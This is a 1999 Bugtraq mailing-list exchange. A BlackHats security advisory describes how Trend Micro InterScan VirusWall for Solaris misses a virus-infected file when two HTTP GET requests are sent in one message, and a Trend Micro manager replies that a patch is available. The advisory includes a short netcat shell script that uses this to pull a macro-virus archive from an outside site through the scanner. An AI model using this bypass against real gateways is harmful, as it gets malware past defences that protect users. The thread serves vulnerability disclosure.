Date: Mon, 22 Feb 1999 21:31:51 +0100
From: The Unicorn <unicorn@BLACKHATS.ORG>
To: BUGTRAQ@netspace.org
Subject: BlackHats Advisory -- InterScan VirusWall

                         BlackHats Security Advisory


           Release date: February 22, 1999
            Application: InterScan Viruswall for Solaris
               Severity: Any user can download binaries and virus
                         infected files though the VirusWall

              Author(s): s10@blackhats.org, unicorn@blackhats.org

---
Overview :
---

        InterScan VirusWall  is part of Trend  Micro's integrated family
of virus protection  products that covers every access  point - Internet
gateways,  groupware,  e-mail and  intranet  servers,  LAN servers,  and
desktops. InterScan VirusWall  scans inbound and outbound  SMTP mail and
attachments, FTP and HTTP traffic  in real time. It automatically cleans
infected files and detects malicious Java applets and ActiveX objects.

        When two HTML GET commands are  combined in one request, of wich
the former points to a non-scanned file like a graphic image (i.e. a GIF
file) and the  latter to a possibly infected binary  or macro file, both
of the  files are  passed to  the user requesting  the data  without any
warning  or logging  by the  VirusWall. We  found that  this combination
was  sometimes  generated  by  well-known  web  browsers  like  Netscape
Communicator and Microsoft Internet Explorer during normal use.

        We informed  Trend Micro of  this vulnerability more  than three
weeks  ago. We  fully described  the  problem to  Trend Engineering  and
included an exploit  similar to the one described below  and all traffic
between the  browser and VirusWall, but  did not receive a  fix for this
problem. The explanation received was that they were unable to reproduce
it on  their systems.  Since these  systems are  used to  protect people
behind (expensive)  firewall configurations against virus  infection, we
decided to make, at least, the  administrators of these systems aware of
this exploit  that can be  used by  users behind an  InterScan VirusWall
configuration to circumvent the implemented security policy.

---
Affected systems:
---

        InterScan Viruswall for Solaris
        Implementations of  InterScan VirusWall  on other  platforms are
        likely to be vulnerable, but are not tested since we do not have
        them available

---
Workarounds/Fixes:
---

        We have  not yet received  a fix from  Trend Micro. It  might be
possible  to close  this  hole by  scanning *ALL*  data  passed in  HTTP
traffic, but  this will have a  negative influence on the  throughput of
the complete firewall configuration.

---
Example:
---

        We developed  the following exploit  that requests two  files in
one message. The first  one is a simple graphic file  (in this case form
the Trend Micro web-site) and the second one is a file containing a well
known macro-virus, which  would normally be detected and  removed by the
product. Using the netcat tool we  send this combined request out to the
world using  the VirusWall as  a proxy-server. The  information received
back is stored in a file. When later examining the file we find both the
graphic and the  virus infected contents requested.  Looking through the
logfiles no trace is found of this file seeping through the hole.

#!/bin/sh
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

" | nc viruswall 80 > the.results

        Changing the second part of  this "code" will enable downloading
any information  through the  Trend Micro InterScan  VirusWall. Probably
because the  product only acts  on the first  GET command in  a message,
while retrieving all information requested.

---
Further Study:
---

        Further study  of this vulnerability  may focus on FTP  and SMTP
traffic and the detection of malicious Java applets and ActiveX objects.


Ciao,
Unicorn.
--
======= _ __,;;;/ TimeWaster ================================================
     ,;( )_, )~\| A Truly Wise Man Never Plays
    ;; //  `--;     Leapfrog With A Unicorn...
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======

----------------------------------------------------------------------------------

Date: Thu, 25 Feb 1999 12:28:46 -0800
From: Bob Li <Bob_Li@TRENDMICRO.COM>
To: BUGTRAQ@netspace.org
Subject: Patch for InterScan VirusWall for Unix now available

We have been recently notified about a potential security hole in our
InterScan Web VirusWall for Solaris product via the "BlackHats Security
Advisory".  The potential problem described relates to being able to
download binaries and virus infected files by using HTTP proxy "keep-alive"
connections.

We have looked into the description of the problem and have identified that
there was a
problem with the software.  As a result, we are issuing a patch which can be
obtained from Trend Micro at http:://www.antivirus.com to resolve the
problem.

This issue applies to InterScan for Solaris and HP-UX.  The Windows NT
version of InterScan does not have this problem.

Bob Li
Product Manager
Trend Micro, Inc.
E-Mail: bob_li@trendmicro.com
Phone: 408-863-6341